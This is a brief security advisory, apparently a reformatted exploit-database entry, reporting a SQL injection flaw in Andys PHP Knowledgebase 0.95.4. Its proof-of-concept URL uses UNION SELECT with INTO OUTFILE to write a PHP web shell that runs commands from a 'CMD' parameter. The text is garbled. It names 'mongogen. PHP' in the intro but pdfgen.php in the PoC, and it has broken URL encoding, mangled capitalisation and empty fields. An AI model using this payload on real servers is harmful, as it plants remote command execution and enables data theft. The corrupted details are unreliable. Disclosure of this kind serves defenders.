Andys PHP Knowledgebase is a knowledge management system. The mongogen. PHP file in Andys PHP Knowledgebase 0.95.4 has the SQL injection vulnerability, which may cause sensitive information leakage.
[+] Info:
~~~~~~~~~
Software ...... .......... Andys PHP Knowledgebase Project 0.95.4
Vulnerability ...... SQL Injection
Threat Level ...... Critical (4/5)
Download ...... http://www.aphpkb.org/
Discovery Date ......
Tested On...
------------------------------------------------------------------------
Author ...... AutoSec Tools
Site ...... http://www.autosectools.com/
Email ........................ John Leitch <john@autosectools.com>
[+] Poc:
~~~~~~~~~
A SQL injection vulnerability can be used to extract arbitrary data.
In some environments it may be possible to create a PHP shell.
-- PoC --
Localhost/aphpkb/plugins/pdfClasses/pdfgen. php? Pdfa = and % 201 = 0% 20 UNION % 20 SELECT % 20 <? Php % 20 system ($ _ GET ["CMD"]); % 20?>, % 20 FROM % 20 dual % 20 INTO % 20 OUTFILE % 20 ../htdocs/shell. php; % 23
Fix: Filter pdfgen. php